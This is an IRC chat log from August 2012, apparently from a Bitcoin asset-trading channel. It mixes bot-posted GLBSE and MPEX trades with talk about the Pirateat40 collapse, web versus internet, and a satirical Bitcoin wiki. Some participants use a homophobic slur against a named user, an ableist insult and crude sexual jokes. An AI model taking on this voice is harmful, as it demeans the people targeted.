BTC [+] Aug 30 01:59:17 i dun really liek them Aug 30 02:05:01 [MPEX] [S.MPOE] 3500 @ 0.00039125 = 1.3694 BTC [-] Aug 30 02:06:27 [GLBSE] [OBSI.HRPT] 1 @ 0.10449 BTC [+] Aug 30 02:07:01 [GLBSE] [RAREEARTH] 9 @ 0.01 = 0.09 BTC [+] Aug 30 02:16:44 [GLBSE] [GIGAMINING] 1 @ 0.8002 BTC [+] Aug 30 02:16:45 [GLBSE] [GIGAMINING] 5 @ 0.80002 = 4.0001 BTC [-] Aug 30 02:16:46 [GLBSE] [GIGAMINING] 5 @ 0.8 = 4 BTC [-] Aug 30 02:16:47 [GLBSE] [GIGAMINING] 2 @ 0.78101 = 1.562 BTC [-] Aug 30 02:16:48 [GLBSE] [GIGAMINING] 9 @ 0.781 = 7.029 BTC [-] Aug 30 02:16:49 [GLBSE] [GIGAMINING] 16 @ 0.78 = 12.48 BTC [-] Aug 30 02:17:13 [GLBSE] [KRAKEN] 3000 @ 0.01 = 30 BTC Aug 30 02:21:15 [GLBSE] [OBSI.HRPT] 1 @ 0.10449 BTC [+] Aug 30 02:21:20 seriously .78 Aug 30 02:22:00 I've made a huge mistake Aug 30 02:22:13 [GLBSE] [GSDPT] 5 @ 0.00339 = 0.017 BTC [+] Aug 30 02:25:05 im not entirely usre that's warranted. Aug 30 02:25:15 yes, the guy was in pirate. nevertheless, he has farms and stuff. Aug 30 02:25:43 !ticker f.giga.etf Aug 30 02:25:45 [MPEX:F.GIGA.ETF] 1day: 0.00064789 / 0.00085908 / 0.0009696 (405931 shares, 348.73 BTC), 30day: 0.00064789 / 0.00099327 / 0.00115139 (7468422 shares, 7,418.20 BTC) Aug 30 02:25:54 whoa 64 ?! Aug 30 02:25:55 jesus. Aug 30 02:26:04 maybe there's more to this than i know. Aug 30 02:26:29 him and pirate are buddies, but how/why does this affect the price of the share Aug 30 02:27:06 Chaang-Noi "LIF.CX to me seemed like a ponzi, esp after I asked him about it. What I am wondering however is why did it go bad so soon? Even if this was designed to fail it should have lasted longer than this." remember that quote ? Aug 30 02:27:06 I mean it is one of the few that are going to be worth something when/if asic hits right? Aug 30 02:27:19 im pretty sure asic is next year's crop. Aug 30 02:27:20 [GLBSE] [OBSI.HRPT] 50 @ 0.10449 = 5.2245 BTC [+] Aug 30 02:27:38 i think maybe he's just gettying hit by a general flood of people from the sinking ship. Aug 30 02:28:09 god damn gigavps making friends with the devil Aug 30 02:28:50 people overvalue the surface of things these days Aug 30 02:29:11 some douche talks nice to them, flatters them a little, wham, best of friends. Aug 30 02:29:16 i blame the school system. Aug 30 02:29:54 [GLBSE] [NASTY] 1 @ 0.54 BTC [+] Aug 30 02:31:47 [MPEX] [S.MPOE] 30600 @ 0.00039125 = 11.9723 BTC [-] Aug 30 02:31:48 [MPEX] [S.MPOE] 2700 @ 0.00039225 = 1.0591 BTC [+] Aug 30 02:37:02 copumpkin had a lobotomy? Aug 30 02:37:08 yup Aug 30 02:37:17 reversable apparently Aug 30 02:37:25 who's honestbob anyway Aug 30 02:37:47 a seriously retarded forum user Aug 30 02:38:00 o Aug 30 02:38:14 speaking of forum users, someone should drag that loupgaroux character on irc Aug 30 02:38:19 i think i'd pay for this. Aug 30 02:38:30 please don't Aug 30 02:38:39 [MPEX] [F.GIGA.ETF] 12876 @ 0.00096573 = 12.4347 BTC [-] Aug 30 02:38:41 [MPEX] [F.GIGA.ETF] 3350 @ 0.00095909 = 3.213 BTC [-] Aug 30 02:38:46 why not ? Aug 30 02:38:54 he is a bag of dicks? Aug 30 02:39:32 well who's a bag of vulvas ? Aug 30 02:42:25 [GLBSE] [GIGAMINING] 7 @ 0.8749 = 6.1243 BTC [+] Aug 30 02:43:01 [GLBSE] [GIGAMINING] 4 @ 0.8749 = 3.4996 BTC [+] Aug 30 02:43:02 [GLBSE] [GIGAMINING] 4 @ 0.875 = 3.5 BTC [+] Aug 30 02:46:51 [GLBSE] [PUREMINING] 1 @ 0.095 BTC [+] Aug 30 02:46:53 [GLBSE] [PUREMINING] 19 @ 0.0953 = 1.8107 BTC [+] Aug 30 02:50:32 [GLBSE] [GSDPT] 85 @ 0.00339 = 0.2882 BTC [+] Aug 30 02:51:08 [GLBSE] [OBSI.ABMO] 3 @ 0.07999999 = 0.24 BTC [+] Aug 30 02:54:50 [GLBSE] [FPGAMINING] 5 @ 0.8689 = 4.3445 BTC [-] Aug 30 02:55:02 [MPEX] [F.GIGA.ETF] 12600 @ 0.00095909 = 12.0845 BTC [-] Aug 30 02:55:56 [GLBSE] [FPGAMINING] 10 @ 0.869 = 8.69 BTC [+] Aug 30 02:58:26 [MPEX] [F.GIGA.ETF] 550 @ 0.00095909 = 0.5275 BTC [-] Aug 30 02:58:27 [MPEX] [F.GIGA.ETF] 388 @ 0.00095695 = 0.3713 BTC [-] Aug 30 03:04:38 [GLBSE] [OBSI.HRPT] 29 @ 0.10449 = 3.0302 BTC [+] Aug 30 03:04:39 [GLBSE] [OBSI.HRPT] 15 @ 0.1045 = 1.5675 BTC [+] Aug 30 03:04:40 [GLBSE] [OBSI.HRPT] 56 @ 0.10485 = 5.8716 BTC [+] Aug 30 03:05:01 [GLBSE] [TYGRR.BOND-PI] 9 @ 0.9999999 = 9 BTC [-] Aug 30 03:05:53 [GLBSE] [ASICMINER] 15 @ 0.1247 = 1.8705 BTC [-] Aug 30 03:13:52 [MPEX] [S.MPOE] 26700 @ 0.00039096 = 10.4386 BTC [-] Aug 30 03:13:54 [MPEX] [S.MPOE] 20108 @ 0.00039086 = 7.8594 BTC [-] Aug 30 03:13:55 [MPEX] [S.MPOE] 292 @ 0.00039074 = 0.1141 BTC [-] Aug 30 03:20:38 [MPEX] [F.GIGA.ETF] 1600 @ 0.00093699 = 1.4992 BTC [-] Aug 30 03:26:40 [MPEX] [F.GIGA.ETF] 1429 @ 0.00092435 = 1.3209 BTC [-] Aug 30 03:26:41 [MPEX] [F.GIGA.ETF] 3100 @ 0.00089278 = 2.7676 BTC [-] Aug 30 03:30:05 [GLBSE] [PPT.DIV] 1 @ 0.07 BTC [+] Aug 30 03:40:15 https://bitcointalk.org/index.php?topic=22032.0 reading this is so very amusing Aug 30 03:40:20 i heartily recomend. Aug 30 03:42:48 [GLBSE] [ASICMINER] 15 @ 0.1247 = 1.8705 BTC [-] Aug 30 03:47:29 mircea: been meaning to congratulate you, you were way ahead of the game on the pirate fiasco Aug 30 03:47:53 was your credit derivative the first major bet against pirate? Aug 30 03:48:04 I hope you didn't lose too much on that Aug 30 03:48:23 did you eventually make something back on his eventual (apparent) collapse? Aug 30 03:48:27 toffoo actually i didn't lose anything, is the thing. Aug 30 03:48:51 the way it played out, i sold the stuff, then the people with the passthroughs misstepped (i don't recall, i think announced 2k and issued 1k or something) Aug 30 03:49:13 and so a major invested paniced and sold into my bid. i cleared ~1k Aug 30 03:49:58 but at any rate, i just wish more people sat for a moment and thought things through. Aug 30 03:50:04 lol coingenuity Aug 30 03:50:17 nice. always better to be lucky than smart is what I say ;) Aug 30 03:50:24 i totally got lucky, is true. Aug 30 03:50:41 after that... well... nobody wanted to touch it anymore really, volume was tiny. Aug 30 03:51:02 I remember considering buying some at the time, Aug 30 03:51:26 but some seemingly smart and well connected people around here were betting against you, Aug 30 03:51:41 the true killer was that some people brought forth not really proof... but some indication of possible collusion. it became clear it's impossible to actually verify a default. Aug 30 03:51:46 with the argument that pirate would probably collapse "some day" .. but not "yet" Aug 30 03:51:56 fact of the matter is, the guy who finally burst it weeks ago is not the first person who didn't get paid. Aug 30 03:52:02 is just the first person who didn't swallow it. Aug 30 03:54:17 toffoo were you invested btw ? Aug 30 03:54:54 I'm started to get pretty proud of myself ... Aug 30 03:55:15 so far, I've managed to swerve MyBitcoin, Bitcoinica, AND pirate Aug 30 03:55:20 o wow. Aug 30 03:55:27 im not sure there's five of us. Aug 30 03:55:30 haven't lost a bitcent to any Aug 30 03:55:33 of course, i wasn't around during mybitcoin. Aug 30 03:55:42 I did lose 10 BTC to bitscalper though Aug 30 03:55:51 i wasn't in that either. Aug 30 03:56:06 hm. when was mybitcoin fiasco ? march 2011 ? Aug 30 03:56:21 no, I think you were around .. it wasn't that long ago Aug 30 03:56:39 o you're right, it was august Aug 30 03:56:47 like a year ago. jeez it seems like forever. Aug 30 03:57:08 actually, I did briefly try mybitcoin and bitcoinica … but I guess it was lucky I didn't stick around too long Aug 30 03:57:49 well.. anyway, here's to hoping people are smarting but a lot smarter. Aug 30 04:03:44 "Bitcoin is a new web-technology that enables people" Aug 30 04:03:51 why do people confuse the web with the internet ? Aug 30 04:06:22 [MPEX] [S.MPOE] 32735 @ 0.00039225 = 12.8403 BTC [+] Aug 30 04:06:24 [MPEX] [S.MPOE] 22965 @ 0.00039399 = 9.048 BTC [+] Aug 30 04:07:34 [MPEX] [F.GIGA.ETF] 16200 @ 0.00084201 = 13.6406 BTC [-] Aug 30 04:07:35 [MPEX] [F.GIGA.ETF] 19300 @ 0.00083588 = 16.1325 BTC [-] Aug 30 04:07:36 [MPEX] [F.GIGA.ETF] 1500 @ 0.00078132 = 1.172 BTC [-] Aug 30 04:07:48 [GLBSE] [OBSI.HRPT] 3 @ 0.10484 = 0.3145 BTC [-] Aug 30 04:08:18 mircea_popescu: because one is a description of the other Aug 30 04:08:36 [MPEX] [B.MPCD.A] 4400 @ 0.0010088 = 4.4387 BTC [+] Aug 30 04:08:37 [MPEX] [B.MPCD.A] 9000 @ 0.00101 = 9.09 BTC [+] Aug 30 04:08:38 [MPEX] [B.MPCD.A] 100000 @ 0.0010105 = 101.05 BTC [+] Aug 30 04:09:03 sorta like saying you're going to town in your boat Aug 30 04:09:13 you mean car, but hey, they're means of transportation so it's ok Aug 30 04:09:23 [MPEX] [B.MPCD.B] 7292 @ 0.001015 = 7.4014 BTC [+] Aug 30 04:09:24 [MPEX] [B.MPCD.B] 20000 @ 0.0010155 = 20.31 BTC [+] Aug 30 04:09:26 [MPEX] [B.MPCD.B] 50000 @ 0.00101575 = 50.7875 BTC [+] Aug 30 04:09:41 [MPEX] [B.MPCD.C] 9607 @ 0.001045 = 10.0393 BTC [+] Aug 30 04:09:42 mircea_popescu: analogy = auto fail Aug 30 04:09:42 [MPEX] [B.MPCD.C] 5800 @ 0.00105 = 6.09 BTC [+] Aug 30 04:09:47 also bad analogy Aug 30 04:09:59 why ? internet carries the web, it's the superset there. Aug 30 04:10:18 what do you think the web is? Aug 30 04:10:44 [MPEX] [S.MPOE] 44408 @ 0.00039074 = 17.352 BTC [-] Aug 30 04:10:45 [MPEX] [S.MPOE] 19263 @ 0.00039013 = 7.5151 BTC [-] Aug 30 04:10:49 it's not a matter of what i think. the web is the sum of all html documents and their connections (ie links). Aug 30 04:11:11 it's implemented on the internet, sure, but that's irrelevant really. Aug 30 04:11:43 I don't think that's correct at all (what does a web have to do with html documents) Aug 30 04:11:51 thats what the web is lol. Aug 30 04:12:06 the internet is laid out like a web, which is why the two terms are used synonymously Aug 30 04:12:14 and web pages are web pages, they are not "the web" Aug 30 04:12:18 well this'd happen to be a barbarism. Aug 30 04:12:37 "The World Wide Web (abbreviated as WWW or W3, commonly known as the Web ), is a system of interlinked hypertext documents accessed via the Internet." Aug 30 04:12:47 the final part is just typical wikipedia crud. Aug 30 04:13:02 guess wikipedia has the final word :p Aug 30 04:13:12 the web couild exist offline or whatever, it doesn't HAVE to be accessed through teh internet. Aug 30 04:13:14 but anyway. Aug 30 04:13:21 yea, your right Aug 30 04:13:29 spose I answered your question anyway though, haha Aug 30 04:13:56 :p Aug 30 04:14:40 "today i learned..." Aug 30 04:14:54 indeed Aug 30 04:16:10 [MPEX] [S.MPOE] 2693 @ 0.00039399 = 1.061 BTC [+] Aug 30 04:16:10 [MPEX] [S.MPOE] 16322 @ 0.00039401 = 6.431 BTC [+] Aug 30 04:16:12 [MPEX] [S.MPOE] 4600 @ 0.00039414 = 1.813 BTC [+] Aug 30 04:16:13 [MPEX] [S.MPOE] 286 @ 0.00039443 = 0.1128 BTC [+] Aug 30 04:16:14 [MPEX] [S.MPOE] 36099 @ 0.000395 = 14.2591 BTC [+] Aug 30 04:16:30 yes pls buy moar shares because i know what teh web is! ty internets! Aug 30 04:29:45 o wow! i just went to register #mpex and i discovered... it was already registered Aug 30 04:29:54 by me. in april. totally forgot doing it. **** ENDING LOGGING AT Thu Aug 30 04:32:28 2012 **** BEGIN LOGGING AT Thu Aug 30 04:32:34 2012 Aug 30 04:41:32 [GLBSE] [FPGAMINING] 1 @ 0.8699 BTC [+] Aug 30 04:43:39 [GLBSE] [ZETA-MINING] 8 @ 0.15185 = 1.2148 BTC [+] Aug 30 04:45:16 you should really move over there, would help us all out thanks Aug 30 04:48:17 Chaang-Noi i'm not the one you should be butthurt at. Aug 30 04:49:41 butthurt? not at all, ignoring your spam is not that much of a bother Aug 30 04:50:17 eh go sell some pirate bonds why don't ya. Aug 30 04:52:47 [GLBSE] [GMVT-BOT] 4 @ 0.178 = 0.712 BTC [-] Aug 30 04:56:30 [GLBSE] [GMVT-BOT] 56 @ 0.1785 = 9.996 BTC [+] Aug 30 04:56:56 [GLBSE] [GMVT-BOT] 3 @ 0.1785 = 0.5355 BTC [+] **** BEGIN LOGGING AT Thu Aug 30 16:09:59 2012 Aug 30 16:11:13 [MPEX] [S.MPOE] 18464 @ 0.00038848 = 7.1729 BTC [-] Aug 30 16:11:14 [MPEX] [S.MPOE] 30700 @ 0.00038832 = 11.9214 BTC [-] Aug 30 16:11:16 [MPEX] [S.MPOE] 3536 @ 0.00038831 = 1.3731 BTC [-] Aug 30 16:16:50 [GLBSE] [BITCOINMINV] 3 @ 0.1261 = 0.3783 BTC [-] Aug 30 16:19:38 [GLBSE] [ARS] 4 @ 0.014 = 0.056 BTC [-] Aug 30 16:21:27 [MPEX] [S.DICE] 2900 @ 0.0034 = 9.86 BTC [+] Aug 30 16:28:07 [MPEX] [F.GIGA.ETF] 300 @ 0.00089379 = 0.2681 BTC [+] Aug 30 16:30:01 As part of the global push to tax the rich, Britain is now debating an “emergency” wealth tax. But the idea has hit fierce opposition from conservatives, who say the “politics of envy” hasn’t made the country rich. Aug 30 16:30:08 o hey. any brits wanna buy bitcoins ? Aug 30 16:30:15 you can't tax "the rich" here. Aug 30 16:30:34 yes, this isnt microcash Aug 30 16:30:38 or whatever. Aug 30 16:30:39 ;> Aug 30 16:33:16 [MPEX] [S.MPOE] 26900 @ 0.0003907 = 10.5098 BTC [+] Aug 30 16:36:26 bitcoin is megacash! RAWR! Aug 30 16:39:23 [GLBSE] [GSDPT] 1070 @ 0.00339 = 3.6273 BTC [+] Aug 30 16:40:17 [GLBSE] [GSDPT] 4470 @ 0.0034 = 15.198 BTC [+] Aug 30 16:42:28 [MPEX] [S.MPOE] 15218 @ 0.0003907 = 5.9457 BTC [+] Aug 30 16:43:40 lol Aug 30 16:44:31 reading the log, i feel like i read "bullshit, there arn't bitcoin asset brokers. Name 3" yeah Aug 30 16:45:29 i only had brendio on the top of my head Aug 30 16:45:37 and was definitely too lazy to google fro the other Aug 30 16:45:57 [GLBSE] [OBSI.HRPT] 10 @ 0.1019002 = 1.019 BTC [-] Aug 30 16:47:23 I haven't advertised my services too much becaus I'm not done coding the website Aug 30 16:49:35 whens its gonna be done Aug 30 16:49:40 well that's a silly question Aug 30 16:49:44 when do you expect it to be usable Aug 30 16:50:04 [MPEX] [S.MPOE] 35364 @ 0.00038831 = 13.7322 BTC [-] Aug 30 16:50:04 [MPEX] [S.MPOE] 4300 @ 0.00038822 = 1.6693 BTC [-] Aug 30 16:50:06 [MPEX] [S.MPOE] 6031 @ 0.00038819 = 2.3412 BTC [-] Aug 30 16:51:25 [GLBSE] [GERBITIN.PYRA] 1 @ 0.97 BTC [-] Aug 30 16:53:38 smickles did i miss something ? Aug 30 16:53:48 mircea_popescu is a fag Aug 30 16:54:07 [GLBSE] [JAH] 9 @ 0.165 = 1.485 BTC [+] Aug 30 16:54:09 rg http://polimedia.us/dtng/c/src/134202169416.png Aug 30 16:54:46 there is something i don't understand here tho. if i ihad the option of using a website or talking to a person, i'd chose the later. Aug 30 16:55:03 not everyone is a chatty catht Aug 30 16:55:05 cathy* Aug 30 16:56:02 but i mean, all soets of companies have customer suippoirt phones. Aug 30 16:56:11 what does everyone want to do ? TALK TO A PERSON!!! Aug 30 16:56:57 i dont Aug 30 16:58:40 hm Aug 30 16:58:45 maybe i'm just weird. Aug 30 16:59:19 you're just an old lady Aug 30 16:59:22 who cant get with the times Aug 30 17:02:18 rg: i am working on the minimum viable product right now, so usable and 'done' are almost the same. To answer your question. If I can put some good work in, i'd say 6 days to mvp Aug 30 17:02:34 rg possibly. Aug 30 17:02:44 [MPEX] [S.MPOE] 769 @ 0.00038819 = 0.2985 BTC [-] Aug 30 17:02:44 [MPEX] [S.MPOE] 6831 @ 0.00038809 = 2.651 BTC [-] Aug 30 17:02:45 and rg, if this does well, i'll need a dedi Aug 30 17:03:00 and probably some advise Aug 30 17:03:05 pity rg doesn't have any dedis. Aug 30 17:03:08 but i don't know what advice yet Aug 30 17:03:15 and doesn't know shit about it Aug 30 17:03:16 :D Aug 30 17:05:13 i have plenty of dedis Aug 30 17:05:20 mircea_popescu: i bet you'd like how i'm devoping this thing Aug 30 17:05:25 i just dont have any low end ones Aug 30 17:05:44 low end being under 4gb ram, less than 2 cores Aug 30 17:05:53 o, rg is elitist. Aug 30 17:05:57 i'm taking the perspective that i should make a web ui that fits my needs to service people who 'call me' Aug 30 17:06:13 that's an ideea. Aug 30 17:06:14 so i'll still be available to be called Aug 30 17:06:36 [GLBSE] [GMVT-BOT] 1 @ 0.1785 BTC [+] Aug 30 17:06:37 and the people who don't want to call, can use the web ui Aug 30 17:07:51 [GLBSE] [DMC] 1 @ 0.07 BTC [+] Aug 30 17:08:47 senario: someone call me and asks for 100 call, 10 strike, expiring next month. Aug 30 17:09:10 [GLBSE] [ARS] 32 @ 0.0154 = 0.4928 BTC [+] Aug 30 17:09:16 if i have my web ui setup to where it's darn easy to enter that order, Aug 30 17:09:21 so sorta like a form to email you ? Aug 30 17:09:28 then someone else should be able to use it too Aug 30 17:11:01 [GLBSE] [SILVER] 20 @ 0.0095 = 0.19 BTC [-] Aug 30 17:11:03 not really like a form to email me, more like navagate to the page wihe the button that says "BUY X CALLS" with input for x and the details of the the call Aug 30 17:11:15 market>options>specific option Aug 30 17:11:23 input 100, hit buy Aug 30 17:12:38 the only differenc between my account and a user's account, is that i can set my actions to affect a user's account Aug 30 17:12:53 and the user can only affect their account Aug 30 17:15:01 o that's an interesting approach. Aug 30 17:29:18 not good: https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day Aug 30 17:34:39 EB250 ya someone mentioned it here back then Aug 30 17:41:29 http://www.encyclopediabitcoinica.com/wiki/Pirateat40 << teehee ... Chaang-Noi , its not filled in yet :D have yerself some spleen-venting fun :D Aug 30 17:42:05 :) Aug 30 17:42:12 i did not even know of that site Aug 30 17:42:23 im going to wait until matthews bet to do anything Aug 30 17:42:30 the 9th Aug 30 17:42:47 ;) its new .. (is me and a few others :D) Aug 30 17:42:57 gotta chronicle the lulz somehow Aug 30 17:43:25 yeah its cool Aug 30 17:43:33 ill book mark it:) Aug 30 17:43:40 :D thx Aug 30 17:43:50 "Bitcoin is currently accepted in exchange for alpaca socks[2] and carrots[3], but you can also buy toilet paper on MtGox." Aug 30 17:43:53 :D Aug 30 17:44:00 ^^ anyone else too, have some fun; take it out on a wiki, not the forums :P Aug 30 17:44:02 :) Aug 30 17:48:08 ;;ticker Aug 30 17:48:09 Best bid: 10.75, Best ask: 10.8488, Bid-ask spread: 0.09880, Last trade: 10.75, 24 hour volume: 36164, 24 hour low: 10.6, 24 hour high: 10.98888 Aug 30 17:48:29 ahaha there's an ed for btc now ? Aug 30 17:49:58 MrTiggr so how do i edit it ? Aug 30 17:50:26 yu will need an account Aug 30 17:50:31 simple sign up Aug 30 17:50:32 ewgh. Aug 30 17:50:45 i don't want an account. let anon express itself! Aug 30 17:50:51 if yud rather post copy to me, ill happily put it up :D Aug 30 17:51:07 lol k Aug 30 17:51:36 heh, now there's even bitcoin ed brokers Aug 30 17:51:43 AHAHAHAHAHAH Aug 30 17:51:47 smickles++ Aug 30 17:57:20 mircea_popescu: http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Aug 30 17:57:32 i've only just started, but it's accurate at least Aug 30 17:57:50 ahaha Aug 30 17:58:31 you need to enlist the help of some people on the forum. Aug 30 17:58:56 mircea_popescu: but they would ruin the article by lying about you Aug 30 17:59:20 let lies compete! Aug 30 18:00:26 omg. MrTiggr i notice that offensive site of yours contains libelous and defamatory content about me! I SUE YOU Aug 30 18:00:40 hehehehe Aug 30 18:00:45 yu are fictional Aug 30 18:00:51 read the disclaimer ;) Aug 30 18:00:55 ono. Aug 30 18:00:59 internet is serious business. Aug 30 18:01:03 can we upload photos? Aug 30 18:01:07 http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Aug 30 18:01:16 and yes yu can upload afaik Aug 30 18:01:23 :D enjoi Aug 30 18:01:33 Chaang-Noi give me nice tits you hear ? Aug 30 18:01:38 smickles++ u crack me up dood Aug 30 18:01:43 none of that 1/2 A cup you got there in thailand. Aug 30 18:01:44 hehehehehehehe Aug 30 18:01:53 give "his effigy" nice tits Aug 30 18:02:17 wish i had more energy, i will ahve fun with this Aug 30 18:02:24 its a spleen-soma :D Aug 30 18:02:25 but not tonight, peace all Aug 30 18:02:30 nn goat Aug 30 18:03:09 there should be borat somewhere there Aug 30 18:03:15 hehehehe Aug 30 18:03:29 hey smickles i designate this as my official ab image : http://polimedia.us/dtng/c/src/13463383356.jpg Aug 30 18:07:29 where is the goats on the boats page? Aug 30 18:07:48 iv gota photo to upload Aug 30 18:10:07 MrTiggr please upload this photo to the goat on a boat page http://i1081.photobucket.com/albums/j343/TyGrrTech/f58b08402757.jpg thanks :) Aug 30 18:11:55 http://www.encyclopediabitcoinica.com/wiki/Bitcoin Aug 30 18:12:19 this is correct Aug 30 18:12:47 [MPEX] [S.MPOE] 9500 @ 0.00038988 = 3.7039 BTC [+] Aug 30 18:13:36 lol ... ill get onto it now, goat Aug 30 18:17:57 aw, internal error on upload of that pic Aug 30 18:18:04 [MPEX] [F.GIGA.ETF] 5529 @ 0.00089275 = 4.936 BTC [-] Aug 30 18:18:06 [MPEX] [F.GIGA.ETF] 4941 @ 0.00087952 = 4.3457 BTC [-] Aug 30 18:18:51 MrTiggr needs a dedi Aug 30 18:18:51 Could not create directory "mwstore://local-backend/local-public". Aug 30 18:19:19 lol Aug 30 18:19:28 i'll get the admin onto it Aug 30 18:19:40 (yu think i have enuf energy to maintain a mediawiki ppfft) Aug 30 18:20:27 :D he's on it Aug 30 18:23:45 [GLBSE] [GSDPT] 26 @ 0.0034 = 0.0884 BTC [+] Aug 30 18:24:49 smickles: try agin now Aug 30 18:27:45 [MPEX] [S.MPOE] 17568 @ 0.00038763 = 6.8099 BTC [-] Aug 30 18:27:47 [MPEX] [S.MPOE] 2032 @ 0.00038673 = 0.7858 BTC [-] Aug 30 18:29:17 [GLBSE] [TYGRR.BOND-P] 15 @ 0.09 = 1.35 BTC [+] Aug 30 18:35:39 [GLBSE] [GERBITIN.PYRA] 6 @ 0.9 = 5.4 BTC [-] Aug 30 18:36:50 [MPEX] [S.MPOE] 26168 @ 0.00038673 = 10.12 BTC [-] Aug 30 18:36:52 [MPEX] [S.MPOE] 29233 @ 0.00038663 = 11.3024 BTC [-] Aug 30 18:36:57 [GLBSE] [YABMC] 2 @ 0.1179 = 0.2358 BTC [-] Aug 30 18:37:52 [GLBSE] [GIGAMINING] 6 @ 0.87 = 5.22 BTC [-] Aug 30 18:39:17 [GLBSE] [GERBITIN.PYRA] 5 @ 0.97 = 4.85 BTC [+] Aug 30 18:39:46 [GLBSE] [SILVER] 87 @ 0.0095 = 0.8265 BTC [-] Aug 30 18:43:55 mircea_popescu, lol, good old Peter Lambert Aug 30 18:44:37 bitfoo indeed. Aug 30 18:44:49 why are you digging up old threads anyway? Aug 30 18:45:05 I thought you hated the forums :) Aug 30 18:45:15 well, irl i'm a business consultant, but by my actual education i'm an philosopher/anthropologist Aug 30 18:45:25 so it's a little bit of academic curiosity. Aug 30 18:45:28 aha Aug 30 18:45:44 interesting Aug 30 18:45:58 bitcoin is actually old enough to be treated as an extinct culture if one's so inclined. Aug 30 18:46:07 lol Aug 30 18:46:13 why not, you know ? Aug 30 18:46:17 some people solve crosswords. Aug 30 18:46:19 yeah, it *does* seem like ages ago Aug 30 18:46:37 and for that matter, i loathe the press, too Aug 30 18:46:48 but i do read it. just, i keep everything for a few years first. Aug 30 18:46:58 i normally read newspapers from like the late 2000s atm. Aug 30 18:47:00 hahaha Aug 30 18:47:05 i'm not even kidding. Aug 30 18:47:09 that way it's "history" and not "news" Aug 30 18:47:12 you;d be amazed how informative it is. Aug 30 18:47:12 [MPEX] [S.MPOE] 5867 @ 0.00038663 = 2.2684 BTC [-] Aug 30 18:47:13 [MPEX] [S.MPOE] 42133 @ 0.00038639 = 16.2798 BTC [-] Aug 30 18:47:20 lol Aug 30 18:47:26 that's not a bad idea Aug 30 18:48:19 [GLBSE] [GERBITIN.PYRA] 5 @ 0.97 = 4.85 BTC [+] Aug 30 18:49:04 [GLBSE] [GERBITIN.PYRA] 6 @ 0.9 = 5.4 BTC [-] Aug 30 18:51:27 [GLBSE] [GERBITIN.PYRA] 5 @ 0.97 = 4.85 BTC [+] Aug 30 18:53:44 [GLBSE] [GERBITIN.PYRA] 5 @ 0.9 = 4.5 BTC [-] Aug 30 18:55:04 [GLBSE] [GSDPT] 4000 @ 0.0034 = 13.6 BTC [+] Aug 30 18:56:04 [GLBSE] [BDT] 1 @ 1.05 BTC [+] Aug 30 18:56:45 [GLBSE] [GERBITIN.PYRA] 33 @ 0.9 = 29.7 BTC [-] Aug 30 18:57:21 [GLBSE] [BDT] 6 @ 1.05 = 6.3 BTC [+] Aug 30 18:59:31 [GLBSE] [YABMC] 15 @ 0.1179 = 1.7685 BTC [-] Aug 30 19:00:58 [GLBSE] [JAH] 2 @ 0.165 = 0.33 BTC [+] Aug 30 19:12:04 [GLBSE] [FPGAMINING] 4 @ 0.82621 = 3.3048 BTC [-] Aug 30 19:12:06 [GLBSE] [FPGAMINING] 9 @ 0.82611 = 7.435 BTC [-] Aug 30 19:12:07 [GLBSE] [FPGAMINING] 4 @ 0.826 = 3.304 BTC [-] Aug 30 19:14:48 [GLBSE] [ASICMINER] 2 @ 0.1199 = 0.2398 BTC [-] Aug 30 19:15:48 [GLBSE] [GIGAMINING] 20 @ 0.87 = 17.4 BTC [-] Aug 30 19:15:53 [GLBSE] [NYAN.C] 1 @ 0.45 BTC [-] Aug 30 19:17:05 [MPEX] [S.MPOE] 21767 @ 0.00038639 = 8.4106 BTC [-] Aug 30 19:17:06 [MPEX] [S.MPOE] 34811 @ 0.00038633 = 13.4485 BTC [-] Aug 30 19:18:44 [GLBSE] [FPGA-IPCORE-DEV] 1 @ 0.36 BTC [-] Aug 30 19:19:07 [GLBSE] [FPGA-IPCORE-DEV] 55 @ 0.37999999 = 20.9 BTC [+] Aug 30 19:19:22 [GLBSE] [GERBITIN.PYRA] 1 @ 0.97 BTC [+] Aug 30 19:19:40 [GLBSE] [FPGA-IPCORE-DEV] 1 @ 0.38 BTC [+] Aug 30 19:20:24 [GLBSE] [BIF.5-10.MININGBOND] 28 @ 0.7 = 19.6 BTC [+] Aug 30 19:21:02 [GLBSE] [BIF.5-10.MININGBOND] 75 @ 0.75 = 56.25 BTC [+] Aug 30 19:21:51 [MPEX] [S.MPOE] 7401 @ 0.00038988 = 2.8855 BTC [+] Aug 30 19:21:53 [MPEX] [S.MPOE] 19959 @ 0.00039142 = 7.8124 BTC [+] Aug 30 19:21:54 [MPEX] [S.MPOE] 3700 @ 0.00039417 = 1.4584 BTC [+] Aug 30 19:21:54 [MPEX] [S.MPOE] 25415 @ 0.00039584 = 10.0603 BTC [+] Aug 30 19:23:07 [GLBSE] [BIF.5-10.MININGBOND] 2 @ 0.8 = 1.6 BTC [+] Aug 30 19:23:08 [GLBSE] [FOO.PPPPT] 12 @ 0.08 = 0.96 BTC [+] Aug 30 19:23:30 [GLBSE] [TYGRR.BOND-P] 2 @ 0.06 = 0.12 BTC [-] Aug 30 19:24:04 [GLBSE] [SILVER] 50 @ 0.0095 = 0.475 BTC [-] Aug 30 19:24:30 [GLBSE] [SILVER] 15 @ 0.0095 = 0.1425 BTC [-] Aug 30 19:25:09 [GLBSE] [SILVER] 2 @ 0.0095 = 0.019 BTC [-] Aug 30 19:25:27 [GLBSE] [SILVER] 1 @ 0.0095 BTC [-] Aug 30 19:27:50 [GLBSE] [GMVT-BOT] 10 @ 0.1785 = 1.785 BTC [+] Aug 30 19:28:25 [GLBSE] [FUTUREFUND] 10000 @ 0.00012189 = 1.2189 BTC [+] Aug 30 19:30:04 [GLBSE] [GERBITIN.PYRA] 1 @ 0.97 BTC [+] Aug 30 19:30:17 [GLBSE] [BITCOINMINV] 10 @ 0.12501 = 1.2501 BTC [-] Aug 30 19:30:19 [GLBSE] [BITCOINMINV] 90 @ 0.125 = 11.25 BTC [-] Aug 30 19:30:54 [GLBSE] [BITCOINMINV] 10 @ 0.125 = 1.25 BTC [-] Aug 30 19:31:39 [GLBSE] [BITCOINMINV] 14 @ 0.1378 = 1.9292 BTC [+] Aug 30 19:33:32 [GLBSE] [BITCOINMINV] 40 @ 0.13786 = 5.5144 BTC [+] Aug 30 19:36:14 [GLBSE] [BITCOINMINV] 20 @ 0.13786 = 2.7572 BTC [+] Aug 30 19:40:11 [GLBSE] [YARR] 19 @ 1 = 19 BTC [+] 